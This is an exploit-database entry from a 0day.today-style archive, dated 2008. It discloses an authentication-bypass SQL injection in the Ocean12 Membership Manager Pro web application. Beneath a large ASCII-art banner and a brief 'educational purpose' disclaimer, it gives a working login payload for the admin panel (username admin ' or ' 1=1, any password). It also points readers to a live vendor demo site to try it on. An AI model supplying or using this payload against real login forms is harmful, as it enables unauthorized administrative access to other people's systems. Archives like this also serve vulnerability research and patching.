Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vuln

2008-11-27T00:00:00
ID 1337DAY-ID-4279
Type zdt
Reporter Cyber-Zone
Modified 2008-11-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vuln
===============================================================


***********************************************************************************************************************************************************        
[!]                                                                                                                                                     [!]
[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
[!]                                 O    O            O                                 O      O                                                        [!]
[!]                                 O                 O                                       O                                                         [!]
[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
[!]                                           OO                                                                                                        [!]
[!]                                          OO                                                                                                         [!]
[!]                                         OO                                                                                                          [!]
[!]                                        OO                                                                                                           [!]
***********************************************************************************************************************************************************
 +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++                                       [    Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vulnerability ]                                   ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
¦                                                                                                         ¦       ¦                                       ¦
¦                                                                                                         ¦       ¦         MySQL Version Is :            ¦
¦                                                                                                         ¦       ¦                                       ¦
¦   Script   : http://ocean12tech.com                                                                     ¦       ¦                ![ ]!                  ¦
¦   Download : http://ocean12tech.com/products/membership/                                                ¦       ¦                                       ¦
¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
¦                                                          From The Dark Side Of MoroCCo                                                                 ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:                                                                                                                                                         :
¦  Remember    :                                                                                                                                          ¦
¦  -------------                                                                                                                                          ¦
¦                                                                                                                                                         ¦
¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
¦                                                                                                                                                         ¦

++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++


Bypass : ........

Go To The Admin Panel.
and Login with this information :

username : admin ' or ' 1=1
password : Cyber-Zone or any thing you want :)

yeah bro you  loged in dont worry :)

and this is a live demo :

http://ocean12tech.com/products/membership/demo/

EnjoY.



#  0day.today [2018-04-14]  #